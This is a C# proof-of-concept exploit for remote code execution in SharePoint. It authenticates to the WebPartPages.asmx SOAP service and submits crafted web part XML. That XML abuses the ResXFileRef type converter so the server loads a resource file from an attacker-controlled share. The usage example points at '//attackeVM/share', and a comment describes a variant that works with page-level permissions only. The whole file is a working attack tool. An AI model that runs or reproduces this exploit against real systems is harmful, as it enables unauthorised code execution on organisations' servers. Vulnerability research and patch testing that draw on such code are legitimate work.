﻿using System;
using System.Net;


namespace SP_soap_RCE_PoC
{
    class Program
    {
        static void Main(string[] args)
        {
            try
            {
                if (args.Length != 5)
                {
                    Console.WriteLine("Please provide necessary information:");
                    Console.WriteLine("SP_soap_RCE_PoC.exe <BaseUrl> <UserName> <Password> <Domain> <Remote_Path_To_Resource_File>");
                    Console.WriteLine("Example: SP_soap_RCE_PoC.exe http://Sharepont2019/siteofuser2/ user2 P@ssw0rd contoso //attackeVM/share/SP_soap_RCE_PoC.RCE_Resource.resources");
                    return;
                }

                string BaseURL = args[0];
                string UserName = args[1];
                string Password = args[2];  
                string Domain = args[3];
                string RemotePath = args[4];

                var TC_Type = "System.Resources.ResXFileRef, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089";

                var BF_payload = RemotePath + "; System.Resources.ResourceSet, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089";

                var URL = BaseURL.TrimEnd(new char[]{ '/',' '}) + "/_vti_bin/WebPartPages.asmx";
                var service = new WebPartPages.WebPartPagesWebService { Url = URL };

                service.Credentials = new NetworkCredential(UserName, Password, Domain);
                 
                //Our WebPart xml with payload
                string webPartXml = @"<webParts>
  <webPart xmlns=""http://schemas.microsoft.com/WebPart/v3"">
    <metaData>
      <type name=""Microsoft.SharePoint.Portal.WebControls.BusinessDataListWebPart, Microsoft.SharePoint.Portal,Version=12.0.0.0,Culture=neutral,PublicKeyToken=71e9bce111e9429c"" />
      <importErrorMessage>Attack may be successful!</importErrorMessage>
    </metaData>
    <data>
      <properties>
        <property name=""SomeFakeProperty"" type=""" + TC_Type+@""">"+BF_payload+@"</property>
      </properties>
    </data>
  </webPart>
</webParts>";
                //If an attacker has Add and Customize permissions to only some specific page
                //he/she can use this method with pageUrl to this page
                //var pageUrl = "/sitename/SitePages/Home.aspx"; 
                //WebPartPages.Storage storage = WebPartPages.Storage.Personal;
                //var result = service.AddWebPart(pageUrl, webPartXml, storage);

                var result = service.RenderWebPartForEdit(webPartXml);

                Console.WriteLine(result);
            }
            catch (Exception e)
            {
                Console.WriteLine("{0} Exception caught. with Message {1}", e, e.Message);
            }
        }
    }
}
